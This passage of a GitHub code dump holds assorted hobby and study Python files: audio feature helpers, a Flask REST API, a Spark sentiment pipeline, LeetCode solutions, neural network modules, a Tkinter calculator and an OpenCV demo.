num=width, dtype=int)\n Y = range(height)\n ax.pcolormesh(X, Y, log_spec)\n\n# Create Spectrogram dataset from audio files\ndef make_features_ds(ds, sr):\n return ds.map(\n map_func=lambda audio,label: (get_features(audio, sr), label),\n num_parallel_calls=tf.data.AUTOTUNE)\n\n\n# Create Spectrogram dataset from audio files\ndef make_melspec_ds(ds, sr):\n return ds.map(\n map_func=lambda audio,label: (get_melspec(audio, sr), label),\n num_parallel_calls=tf.data.AUTOTUNE)\n\n# Create Spectrogram dataset from audio files\ndef make_mfcc_ds(ds, sr):\n return ds.map(\n map_func=lambda audio,label: (get_mfcc(audio, sr), label),\n num_parallel_calls=tf.data.AUTOTUNE)\n\n# Create Spectrogram dataset from audio files\ndef make_spec_ds(ds):\n return ds.map(\n map_func=lambda audio,label: (get_spectrogram(audio), label),\n num_parallel_calls=tf.data.AUTOTUNE)\n\n\n# Define function to check if file is in WAV format\ndef is_wav(filename):\n '''\n Checks if files are .wav files\n Utility tool in converting wav to png files\n '''\n return filename.split('.')[-1] == 'wav'\n\ndef opus_to_wav(clips_path, save_path):\n for subdir in os.listdir(clips_path):\n word_path = os.path.join(clips_path, subdir)\n sp = os.path.join(save_path, clips_path[:len(clips_path) - 7][-2:] + \"-\" + subdir)\n os.makedirs(sp)\n print(\"Coverting OPUS to WAV for the\\\"\" + subdir +\"\\\" label\")\n print('++++++++++++++++++++++++++++++++++')\n for recording in os.listdir(word_path):\n recording_path = os.path.join(word_path, recording)\n wav_file = os.path.join(sp, recording.rstrip(\".opus\") + \".wav\")\n if not os.path.exists(wav_file):\n os.system(\"ffmpeg -i \\\"\" + recording_path + \"\\\" \\\"\" + wav_file + \"\\\"\")\n\ndef trim_audio(wav_file_loc):\n y,sr=lb.load(wav_file_loc) #load the file\n trim_file, index = lb.effects.trim(y) # Remove leading and trailing silence\n return trim_file, sr","repo_name":"chrispvasquez/ML-Commands","sub_path":"DLHelperFunctions.py","file_name":"DLHelperFunctions.py","file_ext":"py","file_size_in_byte":6421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15620276340","text":"# File name: app.py\r\n# Author: Benjamin Corn\r\n# Date created: 2/20/2016\r\n# Date last modified: 2/25/2016\r\n# Python Version: 3.0\r\n\r\nfrom flask import Flask\r\nfrom flask.ext.sqlalchemy import SQLAlchemy\r\nfrom flask.ext.restless import APIManager\r\n\r\n# Starting new Flask app\r\napp = Flask(__name__)\r\n\r\n# Starting new sqlite database connection\r\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///classdata.db'\r\ndb = SQLAlchemy(app)\r\n\r\n\r\n# RESTful API database model class\r\nclass Class(db.Model):\r\n\tid = db.Column(db.Integer, primary_key=True)\r\n\tclassnum = db.Column(db.Text)\r\n\tclassname = db.Column(db.Text)\r\n\tprofessor = db.Column(db.Text)\r\n\tclasstype = db.Column(db.Text)\r\n\tseats = db.Column(db.INT)\r\n\tbldgcode = db.Column(db.Text)\r\n\troomcode = db.Column(db.Text)\r\n\tclassdays = db.Column(db.Text)\r\n\tstarttime = db.Column(db.Text)\r\n\tendtime = db.Column(db.Text)\r\n\r\n# Push all structures to database\r\ndb.create_all()\r\n\r\n# Creating APIManager from restless extension\r\nmanager = APIManager(app, flask_sqlalchemy_db=db)\r\n\r\n# Defining valid HTML requests\r\nclass_blueprint = manager.create_api(Class, methods=['GET', 'POST', 'DELETE', 'PUT', 'PATCH'])\r\n\r\n# Running Flask loop sequence\r\nif __name__ == \"__main__\":\r\n\tapp.run()\r\n","repo_name":"bencorn/BU-Scheduling-API","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38112294391","text":"import os\nfrom setuptools import find_packages, setup\n\nwith open(os.path.join(os.path.dirname(__file__), 'README.rst')) as readme:\n README = readme.read()\n\n# allow setup.py to be run from any path\nos.chdir(os.path.normpath(os.path.join(os.path.abspath(__file__), os.pardir)))\n\nsetup(\n name='django-lightcms',\n version='0.1',\n packages=find_packages(include=('lightcms')),\n include_package_data=True,\n license='BSD License', # example license\n description='A cms for developers.',\n long_description=README,\n url='https://github.com/eddmash/django-lightcms',\n author='Eddilbert Macharia',\n author_email='edd.cowan@gmail.com',\n classifiers=[\n ],\n)\n","repo_name":"eddmash/django-lightcms","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73385664692","text":"from pyspark import SparkContext\nfrom pyspark.sql import SQLContext\nimport pyspark.sql.functions as func\nfrom pyspark.sql.functions import from_unixtime\nfrom pyspark.sql.functions import dayofmonth, year, month, col, udf\nfrom pyspark.sql.types import DoubleType\nfrom pyspark.sql import DataFrameWriter\nfrom nltk.sentiment.vader import SentimentIntensityAnalyzer\nimport string\nimport psycopg2\nimport os\nfrom dotenv import load_dotenv\nload_dotenv()\n\nfile_name = \"RC_2005-12.bz2\"\nfile_path = \"s3a://redditcommentsbz2/\" + file_name\n\n# create Spark context\nmaster = os.getenv('master_host')\nsc = SparkContext(master, 'preprocess')\nsqlContext = SQLContext(sc)\n\n# read in data\n\ndata = sqlContext.read.json(file_path).select('created_utc', 'controversiality', 'link_id', 'score', 'body', 'author', 'subreddit', 'id')\\\n .withColumnRenamed('created_utc', 'time').withColumnRenamed('link_id','post_id').withColumnRenamed('body','comment').withColumnRenamed('id','comment_id') # rename columns\ndata = data.filter(~col('comment').isin(['[deleted]', '[removed]'])).filter(~col('author').isin(['[deleted]']))\ndata = data.withColumn('time', from_unixtime(data.time, format='yyyy-MM-dd HH:mm:ss')) # convert unixtime to datetime\ndf = data.withColumn('year', year(data.time)).withColumn('month', month(data.time)).withColumn('day', dayofmonth(data.time)) # calculate year, month, day\n\n# Create sentiment score for each comment\nsid = SentimentIntensityAnalyzer()\n\ndef remove_punctuation(x):\n \"\"\"\n Removes punctuation from comment to calculate sentiment score\n :param: x, str, reddit comment\n :return: nopunc_str, str, comment without punctuation\n \"\"\"\n punc='\"#$%&\\'()*+,-./:;<=>?@[\\\\]^_`{|}~'\n for ch in punc:\n nopunc_str = x.replace(ch, '')\n return nopunc_str\n\ndef vader(x):\n \"\"\"\n Calculates sentiment score of comment.\n :param: x, str, reddit comment with no punctuation\n :return: ss, double, sentiment score\n \"\"\"\n ss = sid.polarity_scores(x)['compound']\n return ss\n\n# apply udf so spark can interpret the functions\nnoPunctuation = udf(lambda x: remove_punctuation(x))\nsentimentScore = udf(lambda x: vader(x))\n\ndf = df.withColumn('clean_comment', noPunctuation(df.comment)) # remove punctuation from comment\ndf = df.withColumn('sentiment', sentimentScore(df.clean_comment)) # calculate sentiment score\ndf = df.withColumn(\"sentiment\", df[\"sentiment\"].cast(\"double\"))\n\n# CREATE TABLES\n\n# create comments table\ncomments = df.select('time', 'year','month','day','post_id','comment_id', 'author', 'comment', 'controversiality', 'score', 'sentiment', 'subreddit')\ncomments.show()\n# create posts table, containing posts and the percentage of negative comments\n#neg_comments = comments.filter(\"sentiment <= -0.7\").groupby('post_id').count()\n#neg_comments = neg_comments.withColumnRenamed(\"count\",\"num_neg_comments\")\n#num_comments_per_post = comments.groupby('post_id').count()\n#num_comments_per_post = num_comments_per_post.withColumnRenamed(\"count\", \"total_comments\")\n#posts = neg_comments.join(num_comments_per_post, 'post_id')\n#posts = posts.withColumn(\"% neg comments\", func.round(neg_comments[\"num_neg_comments\"]/num_comments_per_post[\"total_comments\"],2))\n#posts.show()\n# create user_history table\n#user_avg = df1.select('author','controversiality', 'score', 'sentiment').groupby('author').mean()\n#user_avg = user_avg.withColumnRenamed('avg(controversiality)','avg_controversiality').withColumnRenamed('avg(score)','avg_score').withColumnRenamed('avg(sentiment)','avg_sentiment')\n#user_comments = df1.groupby('author').count()\n#user_comments = user_comments.withColumnRenamed('count','num_comments')\n#user_history = user_avg.join(user_comments, 'author')\n#print('USER HISTORY')\n#user_history.show()\n\n# save file\n#comments.repartition(10).write.option('maxRecordsPerFile',100000).mode('overwrite').csv('/reddit_data/')\n\n\n# WRITE TO POSTGRES\ndb_host = os.getenv(\"db_host\")\ndb_password = os.getenv(\"db_password\")\ndb_port = os.getenv(\"db_port\")\ndb_name = os.getenv(\"db_name\")\ndb_url = \"jdbc:postgresql://\" + db_host + ':' + str(db_port) + '/' + db_name\n\ncomments_table_name = \"comments\"\nposts_table_name = \"posts\"\nproperties = {\n \"driver\": \"org.postgresql.Driver\",\n \"user\": db_user,\n \"password\": db_password}\nwrite_mode = 'append'\ncomments.write.jdbc(url = db_url, table = comments_table_name, mode = write_mode, properties = properties)\n#posts.write.jdbc(url = db_url, table = posts_table_name, mode = write_mode, properties = properties)\n\n","repo_name":"avenacheng/ModDash","sub_path":"data-processing/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":4484,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"18405660969","text":"from itertools import accumulate; from math import floor,ceil,sqrt; import operator; import random; import string; from bisect import *; from collections import deque, defaultdict, Counter, OrderedDict; from functools import reduce,cache; from heapq import *; import unittest; from typing import List,Optional; from functools import cache; from operator import lt, gt\nfrom binary_tree_tester import ser,des; from a_linked_list import make_linked_list\ndef get_sol(): return Solution()\n\nclass Solution:\n # bucket. Time: O(n)\n # https://www.youtube.com/watch?v=EYFcQRwcqk0&t=133s\n def topKFrequent(self, A: List[int], k: int) -> List[int]:\n n=len(A)\n di=Counter(A)\n bucket=[[] for _ in range(n+1)]\n for x in di:\n bucket[di[x]].append(x)\n res=[]\n for i in range(n,-1,-1):\n while k and bucket[i]:\n res.append(bucket[i].pop())\n k-=1\n return res\nclass Solution2:\n # heap\n def topKFrequent(self, nums: List[int], k: int) -> List[int]:\n pq = []\n di = defaultdict(int)\n for num in nums:\n di[num]+=1\n\n for num in di:\n if len(pq)<k:\n heappush(pq,(di[num],num))\n else:\n lowest_freq,x = pq[0]\n if di[num]>lowest_freq:\n heappop(pq)\n heappush(pq,(di[num],num))\n res = [x[1] for x in pq]\n return res\n\n# quick select\nclass Solution3:\n def topKFrequent(self, nums: List[int], k: int) -> List[int]:\n count = Counter(nums)\n unique = list(count.keys())\n\n def partition(left, right, pivot_index) -> int:\n pivot_frequency = count[unique[pivot_index]]\n # 1. move pivot to end\n unique[pivot_index], unique[right] = unique[right], unique[pivot_index]\n\n # 2. move all less frequent elements to the left\n i = left - 1\n for j in range(left, right):\n if count[unique[j]] < pivot_frequency:\n i += 1\n unique[i], unique[j] = unique[j], unique[i]\n\n # 3. move pivot to its final place\n unique[right], unique[i+1] = unique[i+1], unique[right]\n\n return i + 1\n\n def quickselect(left, right, k_smallest) -> None:\n \"\"\"\n Sort a list within left..right till kth less frequent element\n takes its place.\n \"\"\"\n # base case: the list contains only one element\n if left == right:\n return\n\n # select a random pivot_index\n pivot_index = random.randint(left, right)\n\n # find the pivot position in a sorted list\n pivot_index = partition(left, right, pivot_index)\n\n # if the pivot is in its final sorted position\n if k_smallest == pivot_index:\n return\n # go left\n elif k_smallest < pivot_index:\n quickselect(left, pivot_index - 1, k_smallest)\n # go right\n else:\n quickselect(pivot_index + 1, right, k_smallest)\n\n n = len(unique)\n # kth top frequent element is (n - k)th less frequent.\n # Do a partial sort: from less frequent to the most frequent, till\n # (n - k)th less frequent element takes its place (n - k) in a sorted array.\n # All element on the left are less frequent.\n # All the elements on the right are more frequent.\n quickselect(0, n - 1, n - k)\n # Return top k frequent elements\n return unique[n - k:]\n\n\nclass mycase(unittest.TestCase):\n def test01(self):\n self.assertEqual([1,2],get_sol().topKFrequent([1,1,1,2,2,3], 2))\n","repo_name":"afzalsiddique/problem-solving","sub_path":"Problem_Solving_Python/leetcode/lc347.py","file_name":"lc347.py","file_ext":"py","file_size_in_byte":3753,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"36707665073","text":"from . import views\nfrom django.conf.urls.static import static\nfrom django.urls import path, include\nfrom moonbling import settings\n\nurlpatterns = [\n path('', views.product_list, name='main'),\n path('shop/', views.product_list, name='product_list'),\n path('shop/<str:category_slug>/', views.product_list, name='product_list_by_category'),\n path('shop/<str:slug>/<int:product_id>', views.product_detail, name='product_detail'),\n path('shop/about', views.about, name='about'),\n path('shop/contacts', views.contacts, name='contacts'),\n path('product_update/<int:product_id>', views.product_update, name='product_update'),\n path('admin_logout/', views.admin_logout, name='admin_logout')\n ]\nurlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","repo_name":"Melikhov-p/moonbling","sub_path":"shop/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"45677948805","text":"import torch\r\nfrom einops import rearrange\r\nfrom torch import nn\r\n\r\nfrom protein_learning.networks.common.helpers.torch_utils import fused_gelu as NONLIN\r\nfrom protein_learning.networks.common.utils import default\r\nfrom protein_learning.networks.common.invariant.units import FeedForward\r\n\r\n\r\nclass FiberWeightedOut(nn.Module):\r\n\r\n def __init__(\r\n self,\r\n fiber,\r\n nonlin=NONLIN,\r\n eps=1e-6, # TODO: changed from 1e-12\r\n include_order_stats=False,\r\n ):\r\n super().__init__()\r\n self.fiber = fiber\r\n self.nonlin = nonlin\r\n self.eps = eps\r\n self.transform = nn.ModuleDict()\r\n self.include_order_stats = include_order_stats\r\n dim0, dim1 = fiber.dims[0] + fiber.dims[1], fiber.dims[1]\r\n if include_order_stats:\r\n dim0 += 2 * fiber.dims[1]\r\n mid = (dim0 + dim1) // 2\r\n self.weight_net = nn.Sequential(\r\n nn.Linear(dim0, mid),\r\n nonlin(),\r\n nn.LayerNorm(mid),\r\n nn.Linear(mid, mid),\r\n nonlin(),\r\n nn.LayerNorm(mid),\r\n nn.Linear(mid, dim1),\r\n )\r\n\r\n def forward(self, features):\r\n output = {}\r\n norm = torch.norm(features['1'], dim=-1)\r\n std, mean = torch.std_mean(norm, dim=1)\r\n rel_norm = (norm - mean) / (std + self.eps)\r\n if self.include_order_stats:\r\n m, s = mean.unsqueeze(1), std.unsqueeze(1)\r\n m, s = m.expand_as(rel_norm), s.expand_as(rel_norm)\r\n inp = torch.cat((features['0'].squeeze(-1), rel_norm, m, s), dim=-1)\r\n else:\r\n inp = torch.cat((features['0'].squeeze(-1), rel_norm), dim=-1)\r\n weights = self.weight_net(inp).unsqueeze(-1)\r\n output['0'] = features['0']\r\n output['1'] = torch.sum(features['1'] * weights, dim=-2, keepdim=True)\r\n return output\r\n\r\n\r\nclass WeightedOut(nn.Module):\r\n def __init__(\r\n self,\r\n coord_dim,\r\n feat_dim,\r\n coord_dim_out=1,\r\n nonlin=NONLIN,\r\n eps=1e-5,\r\n include_norms=True,\r\n n_hidden=1,\r\n ):\r\n super().__init__()\r\n self.nonlin = nonlin\r\n self.eps = eps\r\n self.transform = nn.ModuleDict()\r\n self.coord_dim_out = coord_dim_out\r\n self.coord_dim = coord_dim\r\n dim_in = coord_dim + feat_dim if include_norms else feat_dim\r\n mid, dim_out = max(128, dim_in), coord_dim * coord_dim_out\r\n self.weight_net = FeedForward(dim_in, mid, dim_out, n_hidden=n_hidden)\r\n\r\n def forward(self, coords, feats, return_feats=True):\r\n norm = torch.norm(coords, dim=-1)\r\n std, mean = torch.std_mean(norm, dim=1)\r\n rel_norm = (norm - mean) / (std + self.eps)\r\n inp = torch.cat((feats.squeeze(-1), rel_norm), dim=-1)\r\n weights = self.weight_net(inp)\r\n weight_shape = (*weights.shape[:-1], self.coord_dim, self.coord_dim_out, 1)\r\n weights = weights.view(weight_shape)\r\n coords = coords.unsqueeze(-2)\r\n transformed_coords = torch.sum(coords * weights, dim=-3)\r\n\r\n if return_feats:\r\n return transformed_coords, feats\r\n else:\r\n return transformed_coords\r\n\r\n\r\nclass RadialFunc(nn.Module):\r\n \"\"\"NN parameterized radial profile function.\"\"\"\r\n\r\n def __init__(self, num_freq, in_dim, out_dim, edge_dim=None, mid_dim=None, nonlin=NONLIN,\r\n hidden_layer: bool = True, compress=False, dropout=0.0):\r\n super().__init__()\r\n self.num_freq = num_freq\r\n self.in_dim = in_dim\r\n self.edge_dim = default(edge_dim, 0)\r\n mid_dim = default(mid_dim, edge_dim)\r\n self.out_dim = out_dim\r\n bias = dropout > 0\r\n\r\n layer = lambda i, o, norm=True: nn.ModuleList([\r\n nn.Linear(i, o),\r\n nn.LayerNorm(o) if norm else nn.Identity,\r\n nonlin(),\r\n nn.Dropout(dropout) if dropout > 0 else nn.Identity()\r\n ])\r\n if not compress:\r\n self.net = nn.Sequential(\r\n *layer(edge_dim, mid_dim),\r\n *layer(mid_dim, mid_dim) if hidden_layer else nn.Identity(),\r\n nn.Linear(mid_dim, num_freq * in_dim * out_dim, bias=bias)\r\n )\r\n else:\r\n mid_dim, code_dim = edge_dim // 2, edge_dim // 4\r\n self.net = nn.Sequential(\r\n *layer(edge_dim, mid_dim, norm=True),\r\n *layer(mid_dim, code_dim, norm=True),\r\n *layer(code_dim, mid_dim, norm=True),\r\n nn.Linear(mid_dim, num_freq * in_dim * out_dim, bias=bias)\r\n )\r\n\r\n def forward(self, x):\r\n y = self.net(x)\r\n return rearrange(y, '... (o i f) -> ... o () i () f', i=self.in_dim, o=self.out_dim)\r\n\r\n\r\nclass RadialKernel(nn.Module):\r\n \"\"\"NN parameterized radial profile function.\"\"\"\r\n\r\n def __init__(self, num_freq, in_dim, out_dim, edge_dim=None, mid_dim=128):\r\n super().__init__()\r\n self.num_freq = num_freq\r\n self.in_dim = in_dim\r\n self.out_dim = out_dim\r\n self.bin_embedding = nn.Embedding(34, num_freq * in_dim * out_dim)\r\n self._dist_bins = torch.arange(34)\r\n\r\n def dist_bins(self, device):\r\n if self._dist_bins.device != device:\r\n self._dist_bins = self._dist_bins.to(device)\r\n return self._dist_bins\r\n\r\n def forward(self, dists):\r\n print('in radial kernel')\r\n kernels = self.bin_embedding(self.dist_bins(dists.device))\r\n actual_bins = torch.round(torch.clamp((dists - 2.4) / 0.4, 0, 33)).long()\r\n kernels = kernels[actual_bins].squeeze(-2)\r\n return rearrange(kernels, '... (o i f) -> ... o () i () f', i=self.in_dim, o=self.out_dim)\r\n","repo_name":"MattMcPartlon/AttnPacker","sub_path":"protein_learning/networks/common/equivariant/misc.py","file_name":"misc.py","file_ext":"py","file_size_in_byte":5766,"program_lang":"python","lang":"en","doc_type":"code","stars":50,"dataset":"github-code","pt":"21"} +{"seq_id":"20139465408","text":"from typing import List\n\n\"\"\"\nhttps://leetcode.com/problems/maximum-level-sum-of-a-binary-tree/\n\nReturn the smallest level X such that the \nsum of all the values of nodes at level X is maximal.\n\"\"\"\n\n\nclass Solution:\n def maxLevelSum(self, root: TreeNode) -> int:\n def dfSearch(root: TreeNode, level: int, sums: List[int]=[]):\n if not root:\n return sums\n else:\n if level >= len(sums):\n sums.append(0)\n sums[level] += root.val\n dfSearch(root.left, level + 1, sums)\n dfSearch(root.right, level + 1, sums)\n return sums\n\n sums = dfSearch(root, 0)\n return sums.index(max(sums)) + 1","repo_name":"V-Wong/LeetCode","sub_path":"Tree/max_level_sum.py","file_name":"max_level_sum.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"24220268211","text":"from tkinter import *\r\n\r\ndef evaluate(expression):\r\n operators = [\r\n \"+\",\r\n \"-\",\r\n \"x\",\r\n \"/\",\r\n \"^\"\r\n ]\r\n if expression.find(\"(\") != -1:\r\n if expression.count(\"(\") != expression.count(\")\"):\r\n return \"Error: syntax\"\r\n else:\r\n for x in range(expression.count(\"(\") + 1):\r\n openPar = expression.rfind(\"(\")\r\n closedPar = expression.find(\")\")\r\n \r\n\r\n\r\nbutton_values = [\r\n {\"row\": 1, \"col\": 0, \"value\": \"(\"},\r\n {\"row\": 1, \"col\": 1, \"value\": \")\"},\r\n {\"row\": 1, \"col\": 2, \"value\": \"AC\"},\r\n {\"row\": 1, \"col\": 3, \"value\": \"**\"},\r\n \r\n {\"row\": 2, \"col\": 0, \"value\": \"7\"},\r\n {\"row\": 2, \"col\": 1, \"value\": \"8\"},\r\n {\"row\": 2, \"col\": 2, \"value\": \"9\"},\r\n {\"row\": 2, \"col\": 3, \"value\": \"/\"},\r\n\r\n {\"row\": 3, \"col\": 0, \"value\": \"4\"},\r\n {\"row\": 3, \"col\": 1, \"value\": \"5\"},\r\n {\"row\": 3, \"col\": 2, \"value\": \"6\"},\r\n {\"row\": 3, \"col\": 3, \"value\": \"*\"},\r\n\r\n {\"row\": 4, \"col\": 0, \"value\": \"1\"},\r\n {\"row\": 4, \"col\": 1, \"value\": \"2\"},\r\n {\"row\": 4, \"col\": 2, \"value\": \"3\"},\r\n {\"row\": 4, \"col\": 3, \"value\": \"-\"},\r\n\r\n {\"row\": 5, \"col\": 0, \"value\": \"0\"},\r\n {\"row\": 5, \"col\": 1, \"value\": \".\"},\r\n {\"row\": 5, \"col\": 2, \"value\": \"=\"},\r\n {\"row\": 5, \"col\": 3, \"value\": \"+\"},\r\n]\r\n\r\nUSING_RPI = False\r\n\r\nclass MainGui(Frame):\r\n def __init__(self, master):\r\n Frame.__init__(self, master)\r\n if USING_RPI:\r\n master.attributes(\"-fullscreen\", True)\r\n self.setupGui()\r\n\r\n def makeButton(self, row, col, value):\r\n bg_color = \"#cccccc\"\r\n if value == \"=\":\r\n bg_color = \"blue\"\r\n\r\n button = Button(\r\n self,\r\n font=(\"Helvetica\", 20),\r\n text=value,\r\n bg=bg_color,\r\n highlightbackground=bg_color,\r\n borderwidth=0,\r\n highlightthickness=0,\r\n width=5,\r\n activebackground=\"white\",\r\n command= lambda : self.handle_button_press(value)\r\n )\r\n button.grid(row=row, column=col, sticky=NSEW)\r\n\r\n def setupGui(self):\r\n self.display = Label(self, text=\"\", anchor=E, bg=\"white\", fg=\"black\", height=1, font=(\"Helvetica\", 30))\r\n self.display.grid(row=0, column=0, columnspan=4, sticky=NSEW)\r\n\r\n for row in range(6):\r\n Grid.rowconfigure(self, row, weight=1)\r\n for col in range(4):\r\n Grid.columnconfigure(self, col, weight=1)\r\n for button in button_values:\r\n self.makeButton(button[\"row\"], button[\"col\"], button[\"value\"])\r\n \r\n self.pack(fill=BOTH, expand=1)\r\n self.errored = False\r\n self.calculated = False\r\n\r\n def handle_button_press(self, buttonVal):\r\n display = self.display[\"text\"]\r\n clear = buttonVal == \"AC\"\r\n evaluate = buttonVal == \"=\"\r\n numeric = buttonVal in list(\"0123456789\")\r\n\r\n if clear:\r\n self.display[\"text\"] = \"\"\r\n return\r\n if evaluate:\r\n try:\r\n result = str(eval(display))\r\n self.display[\"text\"] = result\r\n self.calculated = True\r\n except:\r\n self.display[\"text\"] = \"ERROR\"\r\n self.errored = True\r\n return\r\n if self.errored and numeric:\r\n self.display[\"text\"] = \"\"\r\n self.errored = False\r\n self.display[\"text\"] += buttonVal\r\n return\r\n if self.calculated and numeric:\r\n self.display[\"text\"] = \"\"\r\n self.calculated = False\r\n self.display[\"text\"] = buttonVal\r\n self.display[\"text\"] += buttonVal\r\n self.calculated = False\r\n return\r\n\r\nwindow = Tk()\r\nwindow.title(\"Calculator\")\r\nr = MainGui(window)\r\nwindow.mainloop()\r\n\r\n\r\n\r\n \r\n","repo_name":"DanIsHere64/FunWithGit","sub_path":"Calculator.py","file_name":"Calculator.py","file_ext":"py","file_size_in_byte":3835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71198557173","text":"#!/usr/bin/env python3\n# -*- coding:utf-8 -*-\n###\n# Created Date: Thursday, August 22nd 2019, 9:25:01 am\n# Author: Charlene Leong leongchar@myvuw.ac.nz\n# Last Modified: Fri Sep 13 2019\n###\n\nimport numpy as np\nimport torch\n\nimport sklearn.metrics\n\nimport matplotlib.pyplot as plt\nimport matplotlib.patheffects as PathEffects\nfrom mpl_toolkits.mplot3d import Axes3D\nimport seaborn as sns\nsns.set(font_scale=2)\n\nSEED = 489\n\ndef plt_scatter(feat=[], labels=[], colors=[], output_dir='.', plt_name='', pltshow=False):\n print('Plotting {}\\n'.format(plt_name))\n labels_list = np.unique(labels[labels!=-1]) # -1 is noise \n palette = sns.color_palette('hls', labels_list.max()+1)\n feat_colors = [palette[x] if x >= 0 else (0.0, 0.0, 0.0) for x in labels]\n ax = plt.subplot()\n ax.tick_params(axis='both', labelsize=10)\n \n if len(colors) == 0:\n plt.scatter(*feat.T, c=feat_colors, s=8, linewidths=1)\n else:\n plt.scatter(*feat[0].T, c=feat_colors, s=8, linewidths=1)\n for i, f in enumerate(feat[1:]):\n plt.scatter(*f.T, c=colors[i], s=8, linewidths=1)\n feat = feat[0]\n\n for label in labels_list: \n xtext, ytext = np.median(feat[labels == label, :], axis=0)\n txt = ax.text(xtext, ytext, str(label), fontsize=18)\n txt.set_path_effects([PathEffects.Stroke(linewidth=5, foreground='w'), PathEffects.Normal()])\n \n plt.savefig(output_dir+'/'+plt_name, bbox_inches='tight')\n if pltshow:\n plt.show()\n plt.close()\n return plt.imread(output_dir+'/'+plt_name)\n\ndef plt_scatter_3D(feat=[], labels=[], colors=[], output_dir='.', plt_name='', pltshow=False):\n print('Plotting {}\\n'.format(plt_name))\n labels_list = np.unique(labels[labels!=-1]) # -1 is noise \n palette = sns.color_palette('hls', labels_list.max()+1)\n feat_colors = [palette[x] if x >= 0 else (0.0, 0.0, 0.0) for x in labels]\n\n fig = plt.figure()\n ax = Axes3D(fig)\n \n if len(colors) == 0:\n ax.scatter(*feat.T, c=feat_colors, s=8, linewidths=1)\n else:\n ax.scatter(*feat[0].T, c=feat_colors, s=8, linewidths=1)\n for i, f in enumerate(feat[1:]):\n ax.scatter(*f.T, c=colors[i], s=8, linewidths=1)\n feat = feat[0]\n\n for label in labels_list: \n xtext, ytext, ztext = np.median(feat[labels == label, :], axis=0)\n txt = ax.text(xtext, ytext, ztext, str(label), fontsize=18)\n txt.set_path_effects([PathEffects.Stroke(linewidth=5, foreground='w'), PathEffects.Normal()])\n\n plt.savefig(output_dir+'/'+plt_name, bbox_inches='tight')\n if pltshow:\n plt.show()\n plt.close()\n return plt.imread(output_dir+'/'+plt_name) \n \ndef plt_confusion_matrix(y_pred, y_target, output_dir, pltshow=False):\n confusion_matrix = sklearn.metrics.confusion_matrix(y_target, y_pred)\n\n plt.figure(figsize=(16, 14))\n sns.heatmap(confusion_matrix, annot=True, fmt='d', annot_kws={'size': 20})\n # plt.title('Confusion matrix', fontsize=10)\n plt.ylabel('True label', fontsize=20)\n plt.xlabel('Clustering label', fontsize=20)\n plt.savefig(output_dir+'/confusion_matrix.png', bbox_inches='tight')\n\n if pltshow:\n plt.show()\n\n return plt.imread(output_dir+'/confusion_matrix.png'), 'confusion_matrix.png'\n\n\ndef plt_clusters(output_dir, data, algorithm, args, kwds):\n fig = plt.figure()\n # start_time = time.time()\n labels = algorithm(*args, **kwds).fit_predict(data)\n # end_time = time.time()\n ax = plt.subplot()\n # ax.axis('tight')\n ax.tick_params(axis='both', labelsize=10)\n # labels_list = np.unique(labels)\n # palette = np.array(sns.color_palette('hls', len(labels_list)))\n palette = sns.color_palette('hls')\n colors = [palette[x] if x >= 0 else (0.0, 0.0, 0.0) for x in labels]\n plt.scatter(data.T[0], data.T[1], c=colors, s=8, linewidths=1)\n # frame = plt.gca()\n # frame.axes.get_xaxis().set_visible(False)\n # frame.axes.get_yaxis().set_visible(False)\n plt.title('Clusters found by {}'.format(str(algorithm.__name__)), fontsize=14)\n #plt.text(-0.5, 0.7, 'Clustering took {:.2f} s'.format(end_time - start_time), fontsize=14)\n plt.savefig(output_dir)\n print ( '\\n saved image ', output_dir)\n plt.close(fig)\n return plt.imread(output_dir)\n\n\n ","repo_name":"charleneleong-ai/kun","sub_path":"models/utils/plt.py","file_name":"plt.py","file_ext":"py","file_size_in_byte":4286,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"10036489838","text":"import cv2\r\nimport numpy as np\r\nimg=cv2.imread('bw.png')\r\nheight=img.shape[0]\r\nwidth=img.shape[1]\r\nchannels=img.shape[2]\r\nimg2=np.zeros((height,width,channels),np.uint8)\r\n\r\n\r\nimg2=cv2.rectangle(img2,(130,0),(230,100),(255,255,255),-1)\r\n\r\nbitAnd=cv2.bitwise_xor(img,img2)\r\n\r\n\r\nprint(height)\r\nprint(width)\r\n\r\n\r\ncv2.imshow('image',img)\r\ncv2.imshow('image2', img2)\r\ncv2.imshow('image3',bitAnd)\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()","repo_name":"Ricky-arch/OpenCV","sub_path":"bit_wise_operations_image.py","file_name":"bit_wise_operations_image.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6303267489","text":"\"\"\"定义Learning_logs的url模式\"\"\"\n\nfrom django.conf.urls import url\n\nfrom . import views\n\nurlpatterns = [\n # Main page\n url(r'^$', views.index, name='index'),\n\n # Show all topics\n url(r'^topics/$', views.topics, name='topics'),\n\n # Special topic to show\n url(r'^topics/(?P<topic_id>\\d+)/$', views.topic, name='topic'),\n]","repo_name":"Snowstark/Learning_log","sub_path":"Learning_logs/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} 